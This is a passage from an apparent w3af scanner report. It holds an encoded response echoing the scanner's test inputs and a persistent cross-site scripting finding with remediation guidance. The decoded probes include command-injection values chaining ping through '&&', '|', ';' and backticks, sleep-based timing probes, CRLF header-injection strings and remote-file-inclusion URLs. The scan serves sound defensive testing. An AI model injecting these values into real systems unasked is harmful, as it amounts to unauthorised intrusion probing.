CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+XigjJCFAIyQpKCgpKSkqKioqKio8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+aHR0cDovL3d3dy53M2FmLm9yZy88L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+aHR0cDovL3d3dy53M2FmLm9yZy88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
Ly93M2FmLm9yZzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vL3czYWYub3JnPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlM4eDZITEJjPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjwhLS08L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+PCEtLTwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD5waW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD51amtlbzwvLT48L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NzZ1Mmtg
NzZ1Mms8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+MjJyNWoiMjJyNWo8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+MzZ4YXkgPTwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD53NGxvNi8qPC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiI8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+Ijwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5pRG9udEV4aXN0
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmlEb250RXhpc3Q8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5z
bGVlcCgzKTs8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+c2xlZXAoMyk7PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPnczYWYNCnZ1bG5lcmFibGUwNzNiOiBhZTVjdzNhZjwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD53M2FmDQp2dWxuZXJhYmxlMDczYjogYWU1PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnczYWYNdnVsbmVyYWJsZTA3
M2I6IGFlNWM8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+dzNhZg12dWxuZXJhYmxlMDczYjogYWU1Y3czYWY8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+dzNhZgp2dWxuZXJhYmxlMDczYjogYWU1Yzwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD53M2FmCnZ1bG5lcmFibGUwNzNiOiBhZTVjdzNhZjwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD5odHRwOi8vdzNhZi5vcmcvcmZpLmh0bWw8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+aHR0cDovL3czYWYub3JnL3JmaS5odG1sPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPnczYWYub3JnL3JmaS5odG1sPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPnczYWYub3JnL3JmaS5odG1s
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmhUdFA6Ly93M2FmLm9yZy9yZmkuaHRtbDwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5oVHRQOi8vdzNhZi5vcmcvcmZpLmh0bWw8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+dXJ4OHE8Ly0+PC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjZ5eWpiIjZ5eWpiPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmt1dWh1Lyo8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+bm5zYjRgbm5zYjQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+Z21tMzUgPTwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBX
b3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4vdXNyL3NiaW4vcGluZyAtcyBs
b2NhbGhvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiYmcGluZyAtbiA0IGxvY2FsaG9zdDwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD5UaHJlYWQuc2xlZXAoMzAwMCk7PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlRocmVhZC5zbGVl
cCgzMDAwKTs8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
JiZwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPlRocmVhZC5TbGVlcCgzMDAwKTs8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+VGhyZWFkLlNsZWVwKDMwMDApOzwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD4mJi91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsPC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnxwaW5nIC1uIDQg
bG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPnxwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnwvdXNyL3Ni
aW4vcGluZyAtcyBsb2NhbGg8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+O3BpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
O3BpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+Oy91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsaDwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhv
c3RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+cGluZyAtYyA0IGxvY2FsaG9zdDwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vdXNyL3NiaW4v
cGluZyAtcyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD4mJnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JiZwaW5nIC1jIDQgbG9j
YWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPiYmL3Vzci9zYmluL3BpbmcgLXMgbG9jYWxob3N0IDQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHBpbmcgLW4gNCBsb2NhbGhv
c3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAg
PHA+fHBpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fC91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsaG9zdCA0PC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjtw
aW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPjtwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjsvdXNyL3NiaW4vcGluZyAt
cyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhvc3Rg
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjwvcD4KICAgICAgICA8cD48L3A+CiAgICAgICAgPGhyIC8+Cg==
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[825, 1175]" method="POST" name="Persistent Cross-Site Scripting vulnerability" plugin="xss" severity="High" url="http://10.12.68.43:31337/post" var="message">
        <description>A persistent Cross Site Scripting vulnerability was found by sending &quot;urx8q&lt;/-&gt;&quot; to the &quot;message&quot; parameter at http://10.12.68.43:31337/post, which is echoed when browsing to http://10.12.68.43:31337/.</description>
        <long-description>Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction. 

 Cross Site Scripting (XSS) allows clients to inject arbitrary scripting code into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or encoding. 

 Persistent Cross Site Scripting vulnerabilities occur when the application stores user controlled information and then uses it to render HTTP response bodies to other clients. 

 This type of vulnerability can be used by a cyber-criminal to perform session hijacking, phishing or denial of service attacks against other web application users.</long-description>
        <fix-guidance>To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page. 

 Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc. Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include: 

 * `&amp;`
 * `&lt;`
 * `&gt;`
 * `&quot;`
 * `'`
 * `/`
 

 An example of HTML entity encoding is converting `&lt;` to `&amp;lt;`. Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed: 

 1. Directly in a script.
 2. Inside an HTML comment.
 3. In an attribute name.
 4. In a tag name.
 5. Directly in CSS.
 

 Each of these locations have their own form of escaping and filtering. 

